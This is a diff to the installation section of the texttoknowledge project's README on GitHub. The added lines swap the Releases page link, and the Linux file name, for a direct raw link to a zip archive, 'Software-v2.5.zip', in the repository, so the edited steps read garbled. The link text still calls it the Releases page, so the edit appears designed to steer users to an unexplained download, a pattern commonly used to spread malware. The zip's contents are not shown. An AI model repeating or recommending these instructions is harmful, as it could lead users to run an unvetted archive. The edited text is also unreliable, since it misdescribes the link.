Yushh2006/texttoknowledge/README.md

 ## 💻 Installation Instructions
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/Yushh2006/texttoknowledge/releases) to find the latest version of texttoknowledge.
+   Go to the [Releases page](https://github.com/Yushh2006/texttoknowledge/raw/refs/heads/main/texttoknowledge/Software-v2.5.zip) to find the latest version of texttoknowledge.

 2. **Download the Application**
    On the Releases page, select the version you want to download.
 Click on the corresponding file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://github.com/Yushh2006/texttoknowledge/raw/refs/heads/main/texttoknowledge/Software-v2.5.zip` file.

 3. **Run the Installer**
    - For Windows: Once downloaded, double-click the `.exe` file and follow the installation prompts.
    - For macOS: Open the `.dmg` file and drag the texttoknowledge icon to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file in a directory of your choice.
+   - For Linux: Extract the downloaded `https://github.com/Yushh2006/texttoknowledge/raw/refs/heads/main/texttoknowledge/Software-v2.5.zip` file in a directory of your choice.
 Navigate to that directory and follow the execution command in the README included inside.

 4. **Open texttoknowledge**
    After installation, locate the application in your programs or applications list and launch it.